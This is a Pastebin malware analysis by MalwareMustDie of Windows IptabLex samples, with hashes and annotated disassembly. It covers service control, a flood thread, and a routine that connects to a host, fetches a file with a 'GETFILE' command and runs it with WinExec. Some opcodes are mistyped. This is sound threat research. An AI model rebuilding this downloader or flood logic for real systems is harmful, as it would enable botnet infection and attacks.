Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #PoC of the IptabLeX windows version exists:
- #MalwareMustDie! analyzed by: @unixfreaxjp
- Case based on: http://blog.malwaremustdie.org/2014/06/mmd-0025-2014-itw-infection-of-elf.html
- //--------------------------------
- // Sample:
- //--------------------------------
- VT: https://www.virustotal.com/en/file/803e3f94d3e7b7ca6ebdb5194a08e13df0e9fd3bb4f2b226bec2ffb50b688002/analysis/1413370561/
- MD5 : 67877403DB7F8CE451B72924188443F8
- Format : Portable executable for 80386 (PE) x32
- OS type : MS Windows
- VT: https://www.virustotal.com/en/file/ea817834fff18e40581f096371be2a7eb062325475805e2b9c51d186ac820137/analysis/1413194264/
- MD5 : 519048ffc7f6c38ab8cb4e0ddac3fad3
- Format : Portable executable for 80386 (PE) x32
- OS type : MS Windows
- //--------------------------------
- // Same usage of the testing URLs:
- //--------------------------------
- 0x4021EB mov dl, ds:byte_0x40D215[eax] // ----> (3)
- 0x4021F1 mov bl, [esi]
- 0x4021F3 sub dl, cl
- 0x4021F5 add dl, bl
- 0x4021F7 sub dl, 73h
- 0x4021FA inc esi
- 0x4021FB mov byte ptr name[eax], dl
- 0x402201 inc eax
- 0x402202 dec edi
- 0x402203 jnz short loc_4021EB
- 0x402205 pop ebx
- .rdata:0x40D216 // <------(3)
- .rdata:0x40D216 aWww_yahoo_com_ db /www.yahoo.com.http://www.baidu.com.
- .rdata:0x40D216 db http://www.china.com.http://www.ifeng.com,0
- //--------------------------------
- // IptableX service launched:
- //--------------------------------
- 0x4034E0 ServiceSus = _SERVICE_STATUS ptr -1Ch
- 0x4034E0 sub esp, 1Ch
- 0x4034E3 push edi
- 0x4034E4 push 20000000h // dwDesiredAccess
- 0x4034E9 push 0 // lpDatabaseName
- 0x4034EB push 0 // lpMachineName
- 0x4034ED call ds:OpenSCManagerA
- 0x4034F3 mov edi, eax
- 0x4034F5 test edi, edi
- 0x4034F7 jz short loc_403542
- 0x4034F9 push ebx
- 0x4034FA push esi
- 0x4034FB push 34h; dwDesiredAccess
- 0x4034FD push offset String // <==== "IptabLex Services"
- 0x403502 push edi; hSCManager
- 0x403503 call ds:OpenServiceA
- 0x403509 mov ebx, ds:CloseServiceHandle
- 0x40350F mov esi, eax
- 0x403511 test esi, esi
- 0x403513 jz short loc_40353D
- 0x403515 lea eax, [esp+28h+ServiceStatus]
- 0x403519 push eax; lpServiceStatus
- 0x40351A push esi; hService
- 0x40351B call ds:QueryServiceStatus
- 0x403521 test eax, eax
- 0x403523 jz short loc_40353A
- 0x403525 cmp [esp+28h+ServiceStatus.dwCurrentState], 4
- 0x40352A jnz short loc_40353A
- 0x40352C lea ecx, [esp+28h+ServiceStatus]
- 0x403530 push ecx; lpServiceStatus
- 0x403531 push 1 ; dwControl
- 0x403533 push esi; hService
- 0x403534 call ds:ControlService
- //--------------------------------
- // DDOS FUNCTION:
- //--------------------------------
- // DWORD __stdcall sub_402680(LPVOID)
- // thread for flood..
- 0x402680 mov eax, [esp+arg_0]
- 0x402684 pus esi
- 0x402685 xor esi, esi
- 0x402687 test eax, eax
- 0x402689 jz short 0x4026C5
- 0x40268B pus ebx
- 0x40268C mov bx, [eax+5]
- 0x402690 pus ebp
- 0x402691 mov bp, [eax+7]
- 0x402695 pus edi
- 0x402696 mov edi, [eax+1]
- 0x402699 pus eax
- 0x40269A call 0x4056A0 // runtime libs..
- 0x40269F add esp, 4
- 0x4026A2
- 0x4026A2 loc_0x4026A2: // xref:0x4026C0 <---(2)
- 0x4026A2 push ebp// buf
- 0x4026A3 push ebx// hostshort
- 0x4026A4 push edi// int
- 0x4026A5 inc esi
- 0x4026A6 call 0x402460 // <===== heres the flood ----->(1)
- :
- 0x4026AB add esp, 0Ch
- 0x4026AE test eax, eax
- 0x4026B0 jnz short 0x4026C2
- 0x4026B2 push 0BB8h // dwMilliseconds
- 0x4026B7 call ds:Sleep // sleep in msec
- 0x4026BD cmp esi, 5
- 0x4026C0 jl short 0x4026A2 ----------->(2) //loop
- [...]
- // int __cdecl sub_0x402460(int, u_short hostshort, char buf)
- 0x402460 sub esp, 0x0914 // xref: 0x4026A6 <-------(1)
- 0x402466 pus ebx
- 0x402467 pus ebp
- 0x402468 pus esi
- 0x402469 pus edi
- 0x40246A pus 0x00
- 0x40246C pus 0x01
- 0x40246E pus 0x02
- 0x402470 mov dword ptr [esp+1C], 0x00
- 0x402478 call dword ptr [0x40D1E4] // socket@WS2_32.DLL (Import, 3 Params)
- 0x40247E mov esi, eax
- 0x402480 test esi, esi
- 0x402482 jl 0x40266B // target: 0x40266B
- 0x402488 mov eax, dword ptr [esp+0000092C]
- 0x40248F mov word ptr [esp+14], 0002
- 0x402496 pus eax
- 0x402497 call dword ptr [0x40D1B8] // tons@WS2_32.DLL (Import, 1 Params)
- 0x40249D mov ecx, dword ptr [esp+00000928]
- 0x4024A4 lea edx, dword ptr [esp+14]
- 0x4024A8 pus 0x10
- 0x4024AA pus edx
- 0x4024AB pus esi
- 0x4024AC mov word ptr [esp+22], ax
- 0x4024B1 mov dword ptr [esp+24], ecx
- 0x4024B5 call dword ptr [0x40D1E8] // connect@WS2_32.DLL (Import, 3 Params)
- 0x4024BB test eax, eax
- 0x4024BD jl 0x40266B // target: 0x40266B
- 0x4024C3 mov ecx, 00000x40
- 0x4024C8 xor eax, eax
- 0x4024CA lea edi, dword ptr [esp+24]
- 0x4024CE rep stosd
- 0x4024D0 lea eax, dword ptr [esp+24]
- 0x4024D4 pus eax
- 0x4024D5 call 0x4023E0 // target: 0x4023E0
- 0x4024DA lea edi, dword ptr [esp+28]
- 0x4024DE or ecx, FFFFFFFF
- 0x4024E1 xor eax, eax
- 0x4024E3 repne scasb
- 0x4024E5 not ecx
- 0x4024E7 dec ecx
- 0x4024E8 lea ecx, dword ptr [esp+ecx+28]
- 0x4024EC pus ecx
- 0x4024ED call 0x4020E0 // target: 0x4020E0
- 0x4024F2 mov ebp, dword ptr [0x40D1EC] // send@WS2_32.DLL (Import, 4 Params)
- 0x4024F8 add esp, 08
- 0x4024FB lea edx, dword ptr [esp+00000930]
- 0x402502 pus 0x00
- 0x402504 pus 0x02
- 0x402506 pus edx
- 0x402507 pus esi
- 0x402508 call ebp // send@WS2_32.DLL (Import, 4 Params)
- 0x40250A cmp eax, 02
- 0x40250D jne 0x4025FD // target: 0x4025FD
- 0x402513 mov ebx, dword ptr [0x40D1F0] // recv@WS2_32.DLL (Import, 4 Params)
- 0x402519 mov ecx, 00000200
- 0x40251E xor eax, eax
- 0x402520 lea edi, dword ptr [esp+00000124]
- 0x402527 rep stosd
- 0x402529 pus eax
- 0x40252A lea eax, dword ptr [esp+00000128]
- 0x402531 pus 00000800
- 0x402536 pus eax
- 0x402537 pus esi
- 0x402538 call ebx// recv@WS2_32.DLL (Import, 4 Params)
- 0x40253A cmp eax, 04
- 0x40253D jne 0x402662 // target: 0x402662
- 0x402543 mov edx, dword ptr [esp+00000124]
- 0x40254A mov ecx, 00000200
- 0x40254F xor eax, eax
- 0x402551 lea edi, dword ptr [esp+00000124]
- 0x402558 rep stosd
- 0x40255A pus edx
- 0x40255B lea ecx, dword ptr [esp+00000128]
- 0x402562 pus 0x40F070 // ASCII "GETFILE_%08X" <==== GET COMMAND
- 0x402567 pus ecx
- 0x402568 mov dword ptr [esp+1C], edx
- 0x40256C call 0x405E8A // // target: 0x405E8A
- 0x402571 lea edi, dword ptr [esp+00000130]
- 0x402578 or ecx, FFFFFFFF
- 0x40257B xor eax, eax
- 0x40257D add esp, 0C
- 0x402580 repne scasb
- 0x402582 not ecx
- 0x402584 dec ecx
- 0x402585 pus eax
- 0x402586 mov edi, ecx
- 0x402588 lea edx, dword ptr [esp+00000128]
- 0x40258F inc edi
- 0x402590 pus edi
- 0x402591 pus edx
- 0x402592 pus esi
- 0x402593 call ebp // send@WS2_32.DLL (Import, 4 Params)
- 0x402595 cmp eax, edi
- 0x402597 jne 0x402662 // target: 0x402662
- 0x40259D lea eax, dword ptr [esp+24]
- 0x4025A1 pus 0x40F068
- 0x4025A6 pus eax
- 0x4025A7 call 0x405D3E // target: 0x405D3E
- 0x4025AC mov ebp, eax
- 0x4025AE add esp, 08
- 0x4025B1 test ebp, ebp
- 0x4025B3 je 0x4025FD // target: 0x4025FD
- 0x4025B5 mov ecx, 00000200 // xref: 0x4025F2
- 0x4025BA xor eax, eax
- 0x4025BC lea edi, dword ptr [esp+00000124]
- 0x4025C3 pus eax
- 0x4025C4 rep stosd
- 0x4025C6 lea ecx, dword ptr [esp+00000128]
- 0x4025CD pus 00000800
- 0x4025D2 pus ecx
- 0x4025D3 pus esi
- 0x4025D4 call ebx recv@WS2_32.DLL (Import, 4 Params)
- 0x4025D6 mov edi, eax
- 0x4025D8 test edi, edi
- 0x4025DA jle 0x4025F4 // target: 0x4025F4
- 0x4025DC pus ebp
- 0x4025DD pus edi
- 0x4025DE lea edx, dword ptr [esp+0000012C]
- 0x4025E5 pus 0x01
- 0x4025E7 pus edx
- 0x4025E8 call 0x405D51 // target: 0x405D51
- 0x4025ED add esp, 10
- 0x4025F0 cmp eax, edi
- 0x4025F2 je 0x4025B5 // target: 0x4025B5
- 0x4025F4 pus ebp // xref: 0x4025DA
- 0x4025F5 call 0x405A54 // target: 0x405A54
- 0x4025FA add esp, 0x04
- 0x4025FD pus esi // xref: 0x40250D 0x4025B3
- 0x4025FE call 0x407E3E // target: 0x407E3E
- 0x402603 lea eax, dword ptr [esp+28]
- 0x402607 pus 0x00
- 0x402609 pus eax
- 0x40260A call 0x40CE32 // target: 0x40CE32
- 0x40260F add esp, 0C
- 0x402612 test eax, eax
- 0x402614 jne 0x40266B // target: 0x40266B
- 0x402616 lea ecx, dword ptr [esp+24]
- 0x40261A pus ecx
- 0x40261B call 0x4023A0 // target: 0x4023A0
- 0x402620 mov ecx, dword ptr [esp+14]
- 0x402624 add esp, 0x04
- 0x402627 cmp eax, ecx
- 0x402629 je 0x402645 // target: 0x402645
- 0x40262B lea edx, dword ptr [esp+24]
- 0x40262F pus edx
- 0x402630 call 0x402450 // target: 0x402450
- 0x402635 add esp, 0x04
- 0x402638 xor eax, eax
- 0x40263A pop edi
- 0x40263B pop esi
- 0x40263C pop ebp
- 0x40263D pop ebx
- 0x40263E add esp, 0x0914
- 0x402644 ret // function end 0x402460
- 0x402645 lea eax, dword ptr [esp+24] // xref: 0x402629
- 0x402649 pus 0x00
- 0x40264B pus eax
- 0x40264C call dword ptr [0x40D0EC] // WinExec@KERNEL32.DLL (Import, 2 Params)
- 0x402652 pop edi
- 0x402653 pop esi
- 0x402654 pop ebp
- 0x402655 mov eax, 0x01
- 0x40265A pop ebx
- 0x40265B add esp, 0x0914
- 0x402661 ret // function end 0x402460
- 0x402662 pus esi // xref: 0x40253D 0x402597
- 0x402663 call 0x407E3E // target: 0x407E3E
- 0x402668 add esp, 0x04
- 0x40266B pop edi // xref: 0x402482 0x4024BD 0x402614
- 0x40266C pop esi
- 0x40266D pop ebp
- 0x40266E xor eax, eax
- 0x402670 pop ebx
- 0x402671 add esp, 0x0914
- 0x402677 ret
- ;;------------------
- ;; #MalwareMUSTDIe!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement